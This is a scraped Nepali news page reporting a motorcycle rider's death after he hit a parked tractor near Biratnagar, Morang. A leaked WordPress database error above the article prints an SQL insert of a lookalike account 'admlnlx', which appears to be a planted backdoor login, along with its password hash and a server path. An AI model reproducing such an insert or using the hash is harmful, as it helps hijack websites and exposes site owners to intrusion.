WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BC/EtQI/988663Qi4HWR09FN0wRufH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 08:57:56', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
मोटरसाइकल आफैँ अनियन्त्रित भई ट्र्याक्टरमा ठोक्किँदा मोटरसाइकल चालकको मृत्यु – Gaule Khabar

मोटरसाइकल आफैँ अनियन्त्रित भई ट्र्याक्टरमा ठोक्किँदा मोटरसाइकल चालकको मृत्यु

मोटरसाइकल आफैँ अनियन्त्रित भई ट्र्याक्टरमा ठोक्किँदा मोटरसाइकल  चालकको मृत्यु

उर्लाबारी (मोरङ), फागुन १ –
कोसीहरैँचा–१४ स्थित विराटचोक–विराटनगर सडकखण्डमा गए राति मोटरसाइकल आफैँ अनियन्त्रित भई ट्र्याक्टरमा ठोक्किँदा एक युवकको मृत्यु भएको छ ।

विराटचोकबाट विराटनगरतर्फ जाँदै गरेको को९प ८४५१ नंको मोटरसाइकल सडक किनारमा पार्किङ गरिराखेको को२त ३०७० नंको ट्र्याक्टरमा ठोक्किँदा मोटरसाइकल चालक नाम, थर र वतन नखुलेका अन्दाजी ३०÷३२ वर्षीय पुरुषको घटनास्थलमै मृत्यु भएको हो । ट्र्याक्टर र त्यसका चालकलाई इप्रका, बेलबारीले नियन्त्रणमा लिएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका